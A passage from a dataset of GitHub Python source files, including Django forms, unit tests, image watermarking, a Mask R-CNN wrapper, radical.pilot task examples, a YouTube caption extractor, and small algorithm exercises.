('change_date', _(u'Change date')),\n ('change_album', _(u'Move to album'))\n )\n\n action = forms.ChoiceField(required=True,\n choices=UPDATE_ACTIONS)\n tags = forms.CharField(required=False)\n date = forms.DateField(\n required=False,\n error_messages={'required': _('Please enter a valid date'),\n 'invalid': _('Please enter a valid date')},)\n album = forms.ChoiceField(choices=Album.objects.all().order_by('name').values_list('id', 'name'))\n next = forms.CharField(required=True)\n\n def __init__(self, *args, **kwargs):\n super(UpdateTagsForm, self).__init__(*args, **kwargs)\n self.fields['album'].choices = Album.objects.all().order_by('name').values_list('id', 'name')\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'action',\n 'tags',\n Div('date', css_class='date-picker-row-fluid'),\n 'album',\n Field('next', type=\"hidden\"),\n Div(\n Submit('submit', _(u'Update'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(UpdateTagsForm, self).clean()\n return cleaned_data\n","repo_name":"alexlittle/django-photo","sub_path":"photo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6150091124","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .. import unittest\nfrom compose import utils\n\n\nclass JsonSplitterTestCase(unittest.TestCase):\n\n def test_json_splitter_no_object(self):\n data = '{\"foo\": \"bar'\n self.assertEqual(utils.json_splitter(data), (None, None))\n\n def test_json_splitter_with_object(self):\n data = '{\"foo\": \"bar\"}\\n \\n{\"next\": \"obj\"}'\n self.assertEqual(\n utils.json_splitter(data),\n ({'foo': 'bar'}, '{\"next\": \"obj\"}')\n )\n\n\nclass StreamAsTextTestCase(unittest.TestCase):\n\n def test_stream_with_non_utf_unicode_character(self):\n stream = [b'\\xed\\xf3\\xf3']\n output, = utils.stream_as_text(stream)\n assert output == '���'\n\n def test_stream_with_utf_character(self):\n stream = ['ěĝ'.encode('utf-8')]\n output, = utils.stream_as_text(stream)\n assert output == 'ěĝ'\n","repo_name":"majidgolshadi/compose","sub_path":"tests/unit/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"41773271462","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\n\ndef watermark_text(input_image_path, output_image_path, text, pos):\n photo = Image.open(input_image_path)\n\n # make the image editable\n drawing = ImageDraw.Draw(photo)\n\n black = (3, 8, 12)\n font = ImageFont.truetype(\"Pillow/Tests/fonts/FreeMono.ttf\", 40)\n drawing.text(pos, text, fill=black, font=font)\n photo.show()\n photo.save(output_image_path)\n\n\ndef watermark_with_transparency(\n input_image_path, output_image_path, watermark_image_path, position\n):\n base_image = Image.open(input_image_path)\n watermark = Image.open(watermark_image_path)\n width, height = base_image.size\n\n transparent = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n transparent.paste(base_image, (0, 0))\n transparent.paste(watermark, position, mask=watermark)\n # transparent.show()\n transparent.save(output_image_path)\n","repo_name":"peterdudfield/mart","sub_path":"mandelbrot/src/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20704922546","text":"from torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport torchvision.models.detection.mask_rcnn\n\nclass Model:\n\tdef __init__(self, num_classes):\n\t\t# Load an instance segmentation model pre-trained on COCO\n\t\tself.model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n\n\t\t# Get number of input features for the classifier\n\t\tin_features = self.model.roi_heads.box_predictor.cls_score.in_features\n\t\t# replace the pre-trained head with a new one\n\t\tself.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n\t\t# Get the number of input features for the mask classifier\n\t\tin_features_mask = self.model.roi_heads.mask_predictor.conv5_mask.in_channels\n\t\thidden_layer = 256\n\t\t# Replace the mask predictor with a new one\n\t\tself.model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n\t\t \t\thidden_layer,\n\t\t \t\tnum_classes)\n\n\t\t\t\t\t\t\t \n\tdef __call__(self):\n\t\treturn self.model\n\n\n","repo_name":"jelyoussefi/maskrcnn_resnet50_fpn-training","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4134821135","text":"'''\n74. Search a 2D Matrix\n\nWrite an efficient algorithm that searches for a value target in an m x n integer matrix matrix. This matrix has the following properties:\n\nIntegers in each row are sorted from left to right.\nThe first integer of each row is greater than the last integer of the previous row.\n\nhttps://leetcode.com/problems/search-a-2d-matrix/\n'''\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if(len(matrix)==0):\n return False\n \n n = len(matrix)\n m=len(matrix[0])\n \n low = 0\n high = (n*m)-1\n \n while(low<=high):\n mid = low+(high-low)//2\n \n if(matrix[mid//m][mid%m] == target):\n return True\n elif(matrix[mid//m][mid%m] 1:\n session_name = sys.argv[1]\n else:\n session_name = None\n\n # Create a new session. No need to try/except this: if session creation\n # fails, there is not much we can do anyways...\n session = rp.Session(uid=session_name)\n print(\"session id: %s\" % session.uid)\n\n # all other pilot code is now tried/excepted. If an exception is caught, we\n # can rely on the session object to exist and be valid, and we can thus tear\n # the whole RP stack down via a 'session.close()' call in the 'finally'\n # clause...\n try:\n\n # Add a Pilot Manager. Pilot managers manage one or more Pilots.\n pmgr = rp.PilotManager (session=session)\n\n # Register our callback with the PilotManager. This callback will get\n # called every time any of the pilots managed by the PilotManager\n # change their state.\n pmgr.register_callback (pilot_state_cb)\n\n # Define a 4-core local pilot that runs for 10 minutes and cleans up\n # after itself.\n\n pdesc1 = rp.PilotDescription()\n pdesc1.resource = \"local.localhost\"\n pdesc1.runtime = 10 # minutes\n pdesc1.cores = 2\n\n pdesc2 = rp.PilotDescription()\n pdesc2.resource = \"local.localhost\"\n pdesc2.runtime = 10 # minutes\n pdesc2.cores = 2\n\n # Launch the pilots\n pilots = pmgr.submit_pilots([pdesc1, pdesc2])\n\n # wait for them to become active\n pmgr.wait_pilots (state=[rp.PMGR_ACTIVE, rp.DONE, rp.FAILED])\n\n\n # Combine the Pilot, the Tasks and a scheduler via\n # a TaskManager object.\n tmgr = rp.TaskManager (session = session,\n scheduler = rp.SCHEDULER_BACKFILLING)\n\n # Register our callback with the TaskManager. This callback will get\n # called every time any of the tasks managed by the TaskManager\n # change their state.\n tmgr.register_callback (task_state_cb, rp.TASK_STATE)\n\n # Register also a callback which tells us when all tasks have been\n # assigned to pilots\n tmgr.register_callback(wait_queue_size_cb, rp.WAIT_QUEUE_SIZE)\n\n\n # Add the previously created Pilot to the TaskManager.\n tmgr.add_pilots (pilots)\n\n # Create a workload of restartable Tasks (tasks).\n tds = []\n for task_count in range(0, 32):\n td = rp.TaskDescription()\n td.executable = \"/bin/sleep\"\n td.arguments = [\"10\"]\n td.restartable = True\n\n tds.append(td)\n\n # Submit the previously created Task descriptions to the\n # PilotManager. This will trigger the selected scheduler to start\n # assigning Tasks to the Pilots.\n tasks = tmgr.submit_tasks(tds)\n\n # the pilots have a total of 4 cores, and run for 10 min. A Task needs about\n # 10 seconds, so we can handle about 24 tasks per minute, and need a total\n # of about 3 minutes. We now wait for 60 seconds, and then cancel the first\n # pilot. The 2 tasks currently running on that pilot will fail, and\n # maybe 2 more which are being pre-fetched into the pilot at that stage\n # - all others should get rescheduled to the other pilot.\n time.sleep(60)\n pilots[0].wait(state=rp.PMGR_ACTIVE)\n pilots[0].cancel()\n\n # Wait for all tasks to reach a terminal state (DONE or FAILED).\n tmgr.wait_tasks()\n\n print('tasks all completed')\n print('----------------------------------------------------------------------')\n\n for task in tasks:\n task.wait()\n\n for task in tasks:\n print(\"* Task %s state: %s, exit code: %s\"\n % (task.uid, task.state, task.exit_code))\n\n except Exception as e:\n # Something unexpected happened in the pilot code above\n print(\"caught Exception: %s\" % e)\n raise\n\n except (KeyboardInterrupt, SystemExit) as e:\n # the callback called sys.exit(), and we can here catch the\n # corresponding KeyboardInterrupt exception for shutdown. We also catch\n # SystemExit (which gets raised if the main threads exits for some other\n # reason).\n print(\"need to exit now: %s\" % e)\n\n finally:\n # always clean up the session, no matter if we caught an exception or\n # not.\n print(\"closing session\")\n session.close ()\n\n # the above is equivalent to\n #\n # session.close (terminate=True)\n #\n # it will thus both clean out the session's database record, and kill\n # all remaining pilots (none in our example).\n\n# -------------------------------------------------------------------------------\n","repo_name":"radical-cybertools/radical.pilot","sub_path":"examples/misc/backfilling_recovery.py","file_name":"backfilling_recovery.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"34802246754","text":"from datetime import datetime\nimport os, os.path\nimport json\nfrom bs4 import BeautifulSoup\nimport youtube_dl\nfrom pycaption import DFXPReader\nfrom concurrent.futures import ThreadPoolExecutor\nimport sqlite3\n\nDB_NAME = '../captions.db'\n\ndef init_db():\n # Tables:\n # files(name)\n # video(id, name, image, transcript) % Technically denormalized a bit for convenience.\n # transcription(vid, start, end, text)\n with sqlite3.connect(DB_NAME) as conn:\n curr = conn.cursor()\n curr.execute('''\n CREATE TABLE video(\n name TEXT NOT NULL,\n image_name TEXT,\n transcript TEXT NOT NULL,\n youtube_id INTEGER NOT NULL\n )\n ''')\n curr.execute('''\n CREATE TABLE transcription(\n video INTEGER NOT NULL,\n start INTEGER NOT NULL,\n stop INTEGER NOT NULL,\n caption TEXT NOT NULL\n )\n ''')\n conn.commit()\n\nTHREAD_COUNT = 32\n\n\"\"\"\nGrab the captions from every video in a YouTube watch-history.html from Google Takeout\n\nOutputs id_to_filename.json which lists the ids and file prefixes (:) \nfor all of the videos. (files are in \"-.txt\" format)\n\nUsage: \n 0. `sudo pip install -r requirements.txt`\n\n 1. move your YouTube folder from Takeout into ../ from this script\n\n 2. `python3 extractor.py` # this takes a LONG time\n\n 3. \n ```\n rm -rf *.ttml # optional \n\n mkdir data\n mv *.txt data/\n mv *.jpg data/\n\n 4.\n ```\n cd ..\n python3 tf_idf.py\n ```\n\n 5. Open Jupyter notebook to Plotting.ipynb or Plotting-copy\n\"\"\"\n# TODO: give option for checkpoints\n# TODO: save also the publisher of the video\n\ndef timeit(func):\n def wrapper(*args, **kwargs):\n start_time = datetime.now()\n func_out = func(*args, **kwargs)\n end_time = datetime.now()\n print('This took: {}'.format(end_time - start_time))\n return func_out\n return wrapper\n\ndef partition(data, pcount):\n plen = int(len(data) / pcount)\n result = []\n current = 0\n for i in range(pcount-1):\n result.append(data[current:current+plen])\n current += plen\n result.append(data[current:])\n return result\n\n@timeit\ndef download_captions():\n # GRAB LINKS\n watch_history_path = '../YouTube/history/watch-history.html'\n soup = BeautifulSoup(open(watch_history_path, encoding='utf8'), 'html.parser')\n links = [link.attrs['href'] for link in soup.find_all('a')] # grab links\n links = list(set(links)) # remove dupes\n print(\"Found {} unique video links in watch-history.html\".format(len(links))) \n # GET IDS AND TITLES OF ALL VIDEOS\n class Logger(object):\n def __init__(self):\n self.logs = []\n def debug(self, msg):\n if not msg.startswith('['):\n self.logs.append(msg)\n def warning(self, msg):\n print(\"WARNING: \"+msg)\n def error(self, msg):\n print(msg)\n\n # MAIN PARAMS\n def progress_hook(d):\n part = d['fragment_index']\n tot = d['fragment_count']\n print(\"{}/{} captions downloaded\".format(part, tot))\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n\n logger = Logger()\n ydl_opts = {\n 'skip_download': True,\n 'ignoreerrors': True,\n 'forceid': True,\n 'forcefilename': True,\n 'writeautomaticsub': True,\n 'writethumbnail': True,\n 'subtitlesformat': 'ttml',\n 'logger': logger,\n 'progress_hooks': [progress_hook],\n }\n def download_links(links):\n # DOWNLOAD CAPTIONS AND THUMBNAILS\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([links])\n with ThreadPoolExecutor(max_workers=THREAD_COUNT) as executor:\n executor.map(download_links, links)\n # threads = [Thread(target=download_links, args=(new_links,)) for new_links in partition(links, THREAD_COUNT)]\n # for t in threads:\n # t.daemon = True\n # t.start()\n # for t in threads:\n # t.join()\n \n\ndef find_valid_files():\n pass\n\ndef read_bin(name):\n with open(name, mode='rb') as f:\n return f.read()\n\n@timeit\ndef parse_captions(path='./'):\n # GRAB ALL VALID CAPTION FILES AND THEIR FILENAMES\n filenames = []\n ids = []\n for file in os.listdir(path):\n if file.endswith(\".ttml\"):\n filenames.append(file[:-8])\n ids.append(file[-19:-8])\n id_to_filename = {ids[i] : filenames[i] for i in range(len(filenames))}\n\n # PARSE CAPTIONS AND PUT THEM IN NICE FORMAT\n cap_reader = DFXPReader()\n\n good_id_to_filename = {} # only save ones that have captions\n n = 0\n N = len(id_to_filename)\n for id in id_to_filename:\n n+=1\n ttml_file = path+id_to_filename[id]+'.en.ttml'\n text_file = path+id_to_filename[id]+'.txt'\n image_file = path+id_to_filename[id]+'.jpg'\n # check if file exists. if not, this video has no autocaptions\n if os.path.isfile(ttml_file) and os.path.isfile(image_file):\n good_id_to_filename[id] = id_to_filename[id]\n with open(ttml_file, 'r', encoding='utf8') as f:\n ttml_txt = f.read()\n caption_set = cap_reader.read(ttml_txt)\n captions = caption_set.get_captions('en-US')\n caption_text = ' '.join([caption.get_text() if caption is not None else '' \\\n for caption in captions])\n with sqlite3.connect(DB_NAME) as conn:\n curs = conn.cursor()\n image_name = id_to_filename[id]+'.jpg'\n video_name = id_to_filename[id]\n curs.execute('INSERT INTO video(name, image_name, transcript, youtube_id) VALUES(?, ?, ?, ?)', (video_name, image_name, caption_text, id,))\n video_id = curs.lastrowid\n for cap in captions:\n if cap is not None:\n curs.execute('INSERT INTO transcription(video, start, stop, caption) VALUES(?, ?, ?, ?)', (video_id, cap.start, cap.end, cap.get_text(),))\n conn.commit()\n with open(text_file, 'w', encoding='utf8') as f:\n f.write(caption_text)\n if n % 100 == 0:\n print(\"{}/{} captions grabbed\".format(n, N))\n\n json.dump(good_id_to_filename, open('id_to_filename.json', 'w'), separators=(', \\n', ': '))\n print(\"Saved captions and thumbnails for {} videos\".format(len(good_id_to_filename)))\n print(\"Done.\")\n\nif __name__ == '__main__':\n init_db()\n download_captions()\n parse_captions(path='./')\n","repo_name":"matwilso/datamining_project","sub_path":"extraction/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71457767751","text":"\"\"\" EXERCISE 4\nFor this exercise suppose you have a web API load balanced across multiple\nnodes. This API receives various requests for resources and logs each request\nto some local storage. Each instance of the API is able to return a dictionary\ncontaining the resource that was accessed (the dictionary key) and the number\nof times it was requested (the associated value).\n\nYour task here is to identify resources that have been requested on some, but\nnot all the servers, so you can determine if you have an issue with your load\nbalancer not distributing certain resource requests across all nodes.\n\nFor simplicity, we will assume that there are exactly 3 nodes in the cluster.\n\nYou should write a function that takes 3 dictionaries as arguments for node 1,\nnode 2, and node 3, and returns a dictionary that contains only keys that are\nnot found in all of the dictionaries. The value should be a list containing the\nnumber of times it was requested in each node (the node order should match the\ndictionary (node) order passed to your function). Use 0 if the resource was not\nrequested from the corresponding node.\n\nSuppose your dictionaries are for logs of all the GET requests on each node:\n\n n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}\n n2 = {'employees': 250, 'users': 23, 'user': 230}\n n3 = {'employees': 150, 'users': 4, 'login': 1000}\n\n\nYour result should then be:\n result = {'employee': (5000, 0, 0),\n 'user': (100, 230, 0),\n 'login': (0, 0, 1000)}\n\"\"\"\n\ndef resources_requested(n1, n2, n3):\n nodes = [n1, n2, n3]\n incomplete_intersection = set()\n for i in range(-2,1):\n incomplete_intersection.add(*{key for key in nodes[i].keys()\n if not nodes[i+1].get(key) or not nodes[i+2].get(key)\n and key not in incomplete_intersection})\n resource_dict = {key : (n1.get(key, 0), n2.get(key, 0), n3.get(key, 0)) \n for key in incomplete_intersection}\n return resource_dict\n\n\n# Testing\nn1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}\nn2 = {'employees': 250, 'users': 23, 'user': 230}\nn3 = {'employees': 150, 'users': 4, 'login': 1000}\n\nprint(resources_requested(n1, n2, n3))\n\n\n# Alternative approach:\ndef identify(n1, n2, n3):\n union = n1.keys() | n2.keys() | n3.keys()\n intersection = n1.keys() & n2.keys() & n3.keys()\n relevant = union - intersection\n result = {key: (n1.get(key, 0),\n n2.get(key, 0),\n n3.get(key, 0))\n for key in relevant}\n return result","repo_name":"EmPlatts/UdemyPython3_DeepDive-My_Solutions","sub_path":"Part_3-Hash-Maps/Exercise_set_1/Exercise_4.py","file_name":"Exercise_4.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37979505368","text":"import pandas as lectorCsv\nfrom datetime import datetime\nfrom statsmodels.tsa.arima_model import ARIMA\nimport numpy as np\nimport joblib as jb\n\n\ndef predecir(n):\n\n # Carga modelos https://joblib.readthedocs.io/en/latest/persistence.html\n modeloTemperatura = jb.load('./modeloTemperatura.pkl')\n modeloHumedad = jb.load('./modeloHumedad.pkl')\n \n # Intervalo de confianza https://github.com/manuparra/MaterialCC2020/blob/master/exampleARIMA_humidity.py\n prediccionTemperatura, confint = modeloTemperatura.predict(n_periods=n, return_conf_int=True)\n prediccionHumedad, confint = modeloHumedad.predict(n_periods=n, return_conf_int=True)\n \n hoy = datetime.now()\n indice = lectorCsv.date_range(hoy, periods=n, freq='H')\n\n datosPrediccion = lectorCsv.DataFrame(index=indice, columns=['Hora','Temperatura','Humedad'])\n # Crear array https://numpy.org/doc/stable/reference/generated/numpy.array.html\n temperatura = np.array(prediccionTemperatura)\n humedad = np.array(prediccionHumedad)\n datosPrediccion['Hora'] = indice.strftime('%B %d, %Y, %r')\n datosPrediccion['Temperatura'] = temperatura\n datosPrediccion['Humedad'] = humedad\n\n return datosPrediccion.to_json(orient='records')\n","repo_name":"Guillergood/CC-Repo-V1","sub_path":"predecir.py","file_name":"predecir.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2705427770","text":"import cPickle as pickle\nimport latex_access\n\n\nclass preprocessor(latex_access.translator):\n '''Preprocessor translator\n\n All translations done by this translator should use the general_command mechanism rather than custom functions.'''\n def __init__(self):\n latex_access.translator.__init__(self) \n self.table={}\n\n def add(self,command,translation):\n '''Add a translation to the table.'''\n self.table[command]=translation\n\n def add_from_string(self, command, args, translation_string):\n '''This adds a command to the preprocessor given its number of arguments as well as its output in the form of an argument to \\newcommand.\n\n Therefore the final argument is a string using #n to denote the nth argument.'''\n translation=[]\n translation.append(args)\n l=translation_string.split(\"#\")\n translation.append(l[0])\n for s in l[1:]:\n translation.append(int(s[0]))\n translation.append(s[1:])\n self.table[command]=translation\n\n def write(self, filename):\n '''Saves the preprocessor entries to a file.'''\n f=open(filename,\"w\")\n pickle.dump(self.table,f)\n f.close()\n\n def read(self, filename):\n '''Reads preprocessor entries from a file and appends them to the dictionary.'''\n f=open(filename)\n newtable=pickle.load(f)\n f.close()\n for (k,v) in newtable.iteritems():\n self.table[k]=v\n\nclass newcommands(latex_access.translator):\n '''Provides a translator to extract all \\newcommand commands from a string.'''\n def __init__(self,preprocessor):\n latex_access.translator.__init__(self)\n self.table={\"\\\\newcommand\":self.newcommand,\"\\\\renewcommand\":self.newcommand}\n self.preprocessor=preprocessor\n \n def newcommand(self, input, start):\n command=latex_access.get_arg(input,start)\n args=latex_access.get_optional_arg(input,command[1])\n if args:\n start=args[1]\n args=int(args[0])\n else:\n args=0\n start=command[1]\n translation=latex_access.get_arg(input,start)\n self.preprocessor.add_from_string(command[0],args,translation[0])\n return (\"\",translation[1])\n \n\n","repo_name":"derekriemer/latex-access-matrix","sub_path":"addon/latex_access/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"243510096","text":"class Solution:\n # @param head, a RandomListNode\n # @return a RandomListNode\n def copyRandomList(self, head):\n if head == None: return None\n tmp = head\n while tmp:\n newNode = RandomListNode(tmp.label)\n newNode.next = tmp.next\n tmp.next = newNode\n tmp = tmp.next.next\n tmp = head\n while tmp:\n if tmp.random:\n tmp.next.random = tmp.random.next\n tmp = tmp.next.next\n newhead = head.next\n pold = head\n pnew = newhead\n while pnew.next:\n pold.next = pnew.next\n pold = pold.next\n pnew.next = pold.next\n pnew = pnew.next\n pold.next = None\n pnew.next = None\n return newhead\n","repo_name":"lizyang95/leetcode","sub_path":"leetcode1/copyRandomList.py","file_name":"copyRandomList.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24279071747","text":"\nimport radical.saga.attributes as rsa\n\nimport spec_attribs as a\n\n\n# ------------------------------------------------------------------------------\n#\nclass OLD_CUD(rsa.Attributes):\n\n def validate(self):\n pass\n\n # --------------------------------------------------------------------------\n #\n def __init__(self, from_dict=None):\n\n # initialize attributes\n rsa.Attributes.__init__(self)\n\n # set attribute interface properties\n self._attributes_extensible (False)\n self._attributes_camelcasing (True)\n\n # register properties with the attribute interface\n # action description\n self._attributes_register(a.KERNEL, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.NAME, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.EXECUTABLE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.ARGUMENTS, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.ENVIRONMENT, None, rsa.STRING, rsa.DICT, rsa.WRITEABLE)\n self._attributes_register(a.SANDBOX, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.PRE_EXEC, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.POST_EXEC, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.RESTARTABLE, None, rsa.BOOL, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.TAGS, None, rsa.ANY, rsa.DICT, rsa.WRITEABLE)\n self._attributes_register(a.METADATA, None, rsa.ANY, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CLEANUP, None, rsa.BOOL, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.PILOT, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n\n\n # I/O\n self._attributes_register(a.STDOUT, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.STDERR, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.INPUT_STAGING, None, rsa.ANY, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.OUTPUT_STAGING, None, rsa.ANY, rsa.VECTOR, rsa.WRITEABLE)\n\n # resource requirements\n self._attributes_register(a.CPU_PROCESSES, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_PROCESS_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_THREADS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_THREAD_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_PROCESSES, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_PROCESS_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_THREADS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_THREAD_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.LFS_PER_PROCESS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.MEM_PER_PROCESS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n\n # explicitly set attrib defaults so they get listed and included via as_dict()\n self.set_attribute (a.KERNEL, None)\n self.set_attribute (a.NAME, None)\n self.set_attribute (a.EXECUTABLE, None)\n self.set_attribute (a.SANDBOX, None)\n self.set_attribute (a.ARGUMENTS, list())\n self.set_attribute (a.ENVIRONMENT, dict())\n self.set_attribute (a.PRE_EXEC, list())\n self.set_attribute (a.POST_EXEC, list())\n self.set_attribute (a.STDOUT, None)\n self.set_attribute (a.STDERR, None)\n self.set_attribute (a.INPUT_STAGING, list())\n self.set_attribute (a.OUTPUT_STAGING, list())\n\n self.set_attribute (a.CPU_PROCESSES, 1)\n self.set_attribute (a.CPU_PROCESS_TYPE, '')\n self.set_attribute (a.CPU_THREADS, 1)\n self.set_attribute (a.CPU_THREAD_TYPE, '')\n self.set_attribute (a.GPU_PROCESSES, 0)\n self.set_attribute (a.GPU_PROCESS_TYPE, '')\n self.set_attribute (a.GPU_THREADS, 1)\n self.set_attribute (a.GPU_THREAD_TYPE, '')\n self.set_attribute (a.GPU_THREAD_TYPE, '')\n self.set_attribute (a.LFS_PER_PROCESS, 0)\n self.set_attribute (a.MEM_PER_PROCESS, 0)\n\n self.set_attribute (a.RESTARTABLE, False)\n self.set_attribute (a.TAGS, dict())\n self.set_attribute (a.METADATA, None)\n self.set_attribute (a.CLEANUP, False)\n self.set_attribute (a.PILOT, '')\n\n # self._attributes_rega.ister_deprecated(a.CORES, CPU_PROCESSES)\n # self._attributes_register_deprecated(a.MPI, CPU_PROCESS_TYPE)\n\n # apply initialization dict\n if from_dict:\n self.from_dict(from_dict)\n\n\n # --------------------------------------------------------------------------\n #\n def __deepcopy__ (self, memo):\n\n other = RSA()\n\n for key in self.list_attributes ():\n other.set_attribute(key, self.get_attribute (key))\n\n return other\n\n\n # --------------------------------------------------------------------------\n #\n def __str__(self):\n \"\"\"Returns a string representation of the object.\n \"\"\"\n return str(self.as_dict())\n\n\n # --------------------------------------------------------------------------\n #\n def verify(self):\n '''\n Verify that the description is syntactically and semantically correct.\n This method encapsulates checks beyond the SAGA attribute level checks.\n '''\n\n # replace 'None' values for strng types with '', etc\n if self.get(KERNEL ) is None: self[KERNEL ] = ''\n if self.get(NAME ) is None: self[NAME ] = ''\n if self.get(EXECUTABLE ) is None: self[EXECUTABLE ] = ''\n if self.get(ARGUMENTS ) is None: self[ARGUMENTS ] = list()\n if self.get(ENVIRONMENT ) is None: self[ENVIRONMENT ] = dict()\n if self.get(PRE_EXEC ) is None: self[PRE_EXEC ] = list()\n if self.get(POST_EXEC ) is None: self[POST_EXEC ] = list()\n if self.get(PILOT ) is None: self[PILOT ] = ''\n if self.get(STDOUT ) is None: self[STDOUT ] = ''\n if self.get(STDERR ) is None: self[STDERR ] = ''\n if self.get(CPU_PROCESS_TYPE) is None: self[CPU_PROCESS_TYPE] = ''\n if self.get(CPU_THREAD_TYPE ) is None: self[CPU_THREAD_TYPE ] = ''\n if self.get(GPU_PROCESS_TYPE) is None: self[GPU_PROCESS_TYPE] = ''\n if self.get(GPU_THREAD_TYPE ) is None: self[GPU_THREAD_TYPE ] = ''\n if self.get(CPU_PROCESSES ) is None: self[CPU_PROCESSES ] = 0\n if self.get(CPU_THREADS ) is None: self[CPU_THREADS ] = 0\n if self.get(GPU_PROCESSES ) is None: self[GPU_PROCESSES ] = 0\n if self.get(GPU_THREADS ) is None: self[GPU_THREADS ] = 0\n if self.get(MEM_PER_PROCESS) is None: self[MEM_PER_PROCESS ] = 0\n\n if not self.get('executable') and \\\n not self.get('kernel') :\n raise ValueError(\"Task description needs 'executable' or 'kernel'\")\n\n\n\n# ------------------------------------------------------------------------------\n\n","repo_name":"radical-cybertools/radical.pilot","sub_path":"concepts/dicts/spec_rs.py","file_name":"spec_rs.py","file_ext":"py","file_size_in_byte":7747,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"26221717036","text":"from pyrogram import Client, filters\nfrom pyrogram.types import CallbackQuery\n\n# Contoh 1 menggunakan custom filter\n\nasync def alert(_, __, cb: CallbackQuery):\n return cb.data == \"alert\"\nalert_filter = filters.create(alert)\n\n@Client.on_callback_query(alert_filter)\nasync def alert_cb(_, cb: CallbackQuery):\n await cb.answer(\"Halo, ini adalah pesan alert\", show_alert=True)\n\n\n# Contoh 2 tidak menggunakan filter, melainkan menggunakan if\n\n@Client.on_callback_query()\nasync def alert_cb_2(_, cb: CallbackQuery):\n if cb.data == \"alert_2\":\n await cb.answer(\"Halo, ini adalah pesan alert\", show_alert=True)\n","repo_name":"hwdevs/HelloWorldTG","sub_path":"helloworld/plugins/callbacks/alert_callback.py","file_name":"alert_callback.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20640322201","text":"from struct import unpack\n\n\nclass BMPException(BaseException):\n pass\n\n\nerrors_en = [\n 'File Not Found!',\n 'Not a valid BMP file!',\n 